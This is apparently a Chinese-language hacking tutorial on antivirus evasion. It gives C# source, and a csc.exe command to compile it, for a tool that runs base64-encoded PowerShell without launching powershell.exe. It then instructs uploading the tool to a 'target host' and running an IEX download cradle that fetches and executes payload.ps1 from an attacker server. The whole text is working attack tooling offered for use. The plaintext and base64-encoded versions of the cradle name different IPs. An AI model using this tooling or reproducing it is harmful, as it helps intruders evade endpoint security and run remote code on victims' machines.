免杀------代替powershell执行语句免杀

通过代码直接调用System.Management，替代powershell.exe

c#代码，保存为1.cs：

using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.IO;
using System;
using System.Text;
namespace PSLess
{
 class PSLess
 {
   static void Main(string[] args)
   {
     if(args.Length ==0)
         Environment.Exit(1);
 string temp = Base64Decode(args[0]);
     string s=RunScript(temp);
     Console.WriteLine(s);
     Console.ReadKey();
   }
   
 public static string Base64Decode(string s)
 {
    return System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(s));
 }
 
 
 private static string RunScript(string script)
 {
    Runspace MyRunspace = RunspaceFactory.CreateRunspace();
    MyRunspace.Open();
    Pipeline MyPipeline = MyRunspace.CreatePipeline();
    MyPipeline.Commands.AddScript(script);
    MyPipeline.Commands.Add("Out-String");
    Collection<PSObject> outputs = MyPipeline.Invoke();
    MyRunspace.Close();
   StringBuilder sb = new StringBuilder();
   foreach (PSObject pobject in outputs)
   {
       sb.AppendLine(pobject.ToString());
   }
    return sb.ToString();
  }
 }
}

利用CSC（编译C#）进行，电脑路径自己找一下，编译：

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /reference:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /out:D:/power_base64.exe 1.cs

将exe上传到目标主机，用base64编码加载：

base64编码语句

IEX ((new-object net.webclient).downloadstring('http://192.168.0.14/payload.ps1'))

Ping 127.0.0.1 -n 5 && cmd /c power_base64.exe "SUVYICgobmV3LW9iamVjdCBuZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzE5Mi4xNjguNDMuMTAwLzEvcGF5bG9hZC5wczEnKSk="